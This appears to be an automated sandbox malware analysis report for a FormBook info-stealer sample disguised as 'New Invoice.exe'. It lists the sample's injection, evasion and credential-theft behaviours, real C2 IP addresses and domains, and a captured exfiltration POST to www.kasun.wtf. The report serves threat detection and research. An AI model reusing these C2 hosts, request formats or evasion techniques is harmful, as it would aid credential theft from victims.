Edit tour

Windows Analysis Report
New Invoice.exe

Overview

General Information

Sample name:	New Invoice.exe
Analysis ID:	1595978
MD5:	61f5ef41bf47457396e098abf61303d4
SHA1:	ac28ba4538d68e10ff5b4c6b502a1f9a9734b2f2
SHA256:	2ded7ae6526b0a58dbeb50d575c13c84f76751f15a81ffb81d4a4d7f9d8539ce
Tags:	exeuser-James_inthe_box
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

New Invoice.exe (PID: 5284 cmdline: "C:\Users\user\Desktop\New Invoice.exe" MD5: 61F5EF41BF47457396E098ABF61303D4)

New Invoice.exe (PID: 2748 cmdline: "C:\Users\user\Desktop\New Invoice.exe" MD5: 61F5EF41BF47457396E098ABF61303D4)

New Invoice.exe (PID: 1400 cmdline: "C:\Users\user\Desktop\New Invoice.exe" MD5: 61F5EF41BF47457396E098ABF61303D4)

hDmn7H3zvRFO6rwhs5DOT.exe (PID: 1220 cmdline: "C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\fYcNwHEdW.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

Utilman.exe (PID: 4996 cmdline: "C:\Windows\SysWOW64\Utilman.exe" MD5: 4F59EE095E37A83CDCB74091C807AFA9)

hDmn7H3zvRFO6rwhs5DOT.exe (PID: 3056 cmdline: "C:\Program Files (x86)\EwFMJkXliqVLWomtLIRkXXzYcVbLeWardTuktmFLWdegMbezemXYpXczeiGH\VRNItzL8hBd6z.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 6728 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.4484490744.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4483401179.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2285266687.0000000005510000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2232530046.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4484804809.0000000004F90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4484749784.0000000004F40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4484533261.0000000004B80000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.2235644456.00000000035C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: New Invoice.exe PID: 5284	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.New Invoice.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.New Invoice.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-21T15:05:28.614285+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49805	13.248.169.48	80	TCP
2025-01-21T15:05:52.473664+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49958	82.221.136.24	80	TCP
2025-01-21T15:06:05.804296+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49988	66.235.200.146	80	TCP
2025-01-21T15:06:19.277358+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49992	104.21.64.1	80	TCP
2025-01-21T15:06:32.932620+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49996	104.21.77.112	80	TCP
2025-01-21T15:06:46.435668+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50000	162.241.62.235	80	TCP
2025-01-21T15:07:03.639808+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50004	13.248.169.48	80	TCP
2025-01-21T15:07:28.052654+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50008	13.248.169.48	80	TCP
2025-01-21T15:07:41.957147+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50012	185.87.149.85	80	TCP
2025-01-21T15:07:55.480387+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50016	192.64.118.221	80	TCP
2025-01-21T15:08:09.774061+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50020	47.83.1.90	80	TCP
2025-01-21T15:08:26.079481+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50024	13.248.169.48	80	TCP
2025-01-21T15:08:39.668759+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50028	174.136.53.218	80	TCP
2025-01-21T15:08:54.247202+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49784	45.126.182.209	80	TCP
2025-01-21T15:09:07.803029+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49788	84.32.84.32	80	TCP
2025-01-21T15:09:21.321196+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49792	47.83.1.90	80	TCP
2025-01-21T15:09:32.911515+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49793	13.248.169.48	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-21T15:05:44.794921+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49905	82.221.136.24	80	TCP
2025-01-21T15:05:47.333829+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49921	82.221.136.24	80	TCP
2025-01-21T15:05:49.883304+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49939	82.221.136.24	80	TCP
2025-01-21T15:05:58.239642+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49985	66.235.200.146	80	TCP
2025-01-21T15:06:00.724742+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49986	66.235.200.146	80	TCP
2025-01-21T15:06:03.279147+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49987	66.235.200.146	80	TCP
2025-01-21T15:06:11.557947+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49989	104.21.64.1	80	TCP
2025-01-21T15:06:14.151395+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49990	104.21.64.1	80	TCP
2025-01-21T15:06:16.779954+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49991	104.21.64.1	80	TCP
2025-01-21T15:06:25.340425+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49993	104.21.77.112	80	TCP
2025-01-21T15:06:27.766387+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49994	104.21.77.112	80	TCP
2025-01-21T15:06:30.341508+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49995	104.21.77.112	80	TCP
2025-01-21T15:06:38.815466+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49997	162.241.62.235	80	TCP
2025-01-21T15:06:41.344115+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49998	162.241.62.235	80	TCP
2025-01-21T15:06:43.902777+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49999	162.241.62.235	80	TCP
2025-01-21T15:06:53.029015+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50001	13.248.169.48	80	TCP
2025-01-21T15:06:55.587422+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50002	13.248.169.48	80	TCP
2025-01-21T15:06:57.089659+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50003	13.248.169.48	80	TCP
2025-01-21T15:07:09.135057+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50005	13.248.169.48	80	TCP
2025-01-21T15:07:12.841601+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50006	13.248.169.48	80	TCP
2025-01-21T15:07:15.388730+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50007	13.248.169.48	80	TCP
2025-01-21T15:07:34.310123+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50009	185.87.149.85	80	TCP
2025-01-21T15:07:36.863926+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50010	185.87.149.85	80	TCP
2025-01-21T15:07:39.435822+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50011	185.87.149.85	80	TCP
2025-01-21T15:07:47.789405+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50013	192.64.118.221	80	TCP
2025-01-21T15:07:50.363077+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50014	192.64.118.221	80	TCP
2025-01-21T15:07:52.894961+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50015	192.64.118.221	80	TCP
2025-01-21T15:08:02.060408+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50017	47.83.1.90	80	TCP
2025-01-21T15:08:04.551406+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50018	47.83.1.90	80	TCP
2025-01-21T15:08:07.279182+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50019	47.83.1.90	80	TCP
2025-01-21T15:08:15.275575+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50021	13.248.169.48	80	TCP
2025-01-21T15:08:18.938654+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50022	13.248.169.48	80	TCP
2025-01-21T15:08:21.560417+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50023	13.248.169.48	80	TCP
2025-01-21T15:08:32.047637+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50025	174.136.53.218	80	TCP
2025-01-21T15:08:34.579871+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50026	174.136.53.218	80	TCP
2025-01-21T15:08:37.126693+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50027	174.136.53.218	80	TCP
2025-01-21T15:08:46.621742+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49781	45.126.182.209	80	TCP
2025-01-21T15:08:49.153835+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49782	45.126.182.209	80	TCP
2025-01-21T15:08:51.759727+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49783	45.126.182.209	80	TCP
2025-01-21T15:08:59.805762+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49785	84.32.84.32	80	TCP
2025-01-21T15:09:02.706450+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49786	84.32.84.32	80	TCP
2025-01-21T15:09:05.272373+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49787	84.32.84.32	80	TCP
2025-01-21T15:09:14.388573+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49789	47.83.1.90	80	TCP
2025-01-21T15:09:16.935512+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49790	47.83.1.90	80	TCP
2025-01-21T15:09:19.482467+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49791	47.83.1.90	80	TCP

HTTP traffic detected: POST /srvo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.kasun.wtfContent-Length: 203Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.kasun.wtfReferer: http://www.kasun.wtf/srvo/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25Data Raw: 44 76 3d 49 6e 6d 39 66 6d 50 46 30 35 77 45 57 65 50 42 78 4f 44 6e 71 79 50 48 31 5a 61 73 76 37 70 34 37 74 43 73 4c 46 51 74 72 43 48 66 55 33 56 43 70 37 38 51 73 32 39 30 49 56 2f 4b 79 38 41 48 47 72 61 4d 48 70 71 64 46 33 74 43 72 4c 35 6d 61 51 70 39 36 34 4e 47 53 33 4d 62 46 34 6f 2b 31 39 75 4f 4a 62 38 2b 39 38 6a 32 6b 64 79 69 66 2b 47 5a 57 33 48 44 47 57 41 6f 59 54 77 6c 53 49 72 35 79 2f 2b 66 30 63 71 5a 71 4c 45 75 4c 68 48 31 73 46 4c 51 38 36 56 4d 72 47 6b 6f 47 53 79 46 49 52 38 62 65 68 31 32 65 56 6b 56 30 4a 66 2b 37 4a 4b 77 71 4f 34 6e 34 5a 39 41 5a 57 76 30 79 6d 6b 3d Data Ascii: Dv=Inm9fmPF05wEWePBxODnqyPH1Zasv7p47tCsLFQtrCHfU3VCp78Qs290IV/Ky8AHGraMHpqdF3tCrL5maQp964NGS3MbF4o+19uOJb8+98j2kdyif+GZW3HDGWAoYTwlSIr5y/+f0cqZqLEuLhH1sFLQ86VMrGkoGSyFIR8beh12eVkV0Jf+7JKwqO4n4Z9AZWv0ymk=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 21 Jan 2025 14:05:44 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 21 Jan 2025 14:05:46 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 21 Jan 2025 14:05:49 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
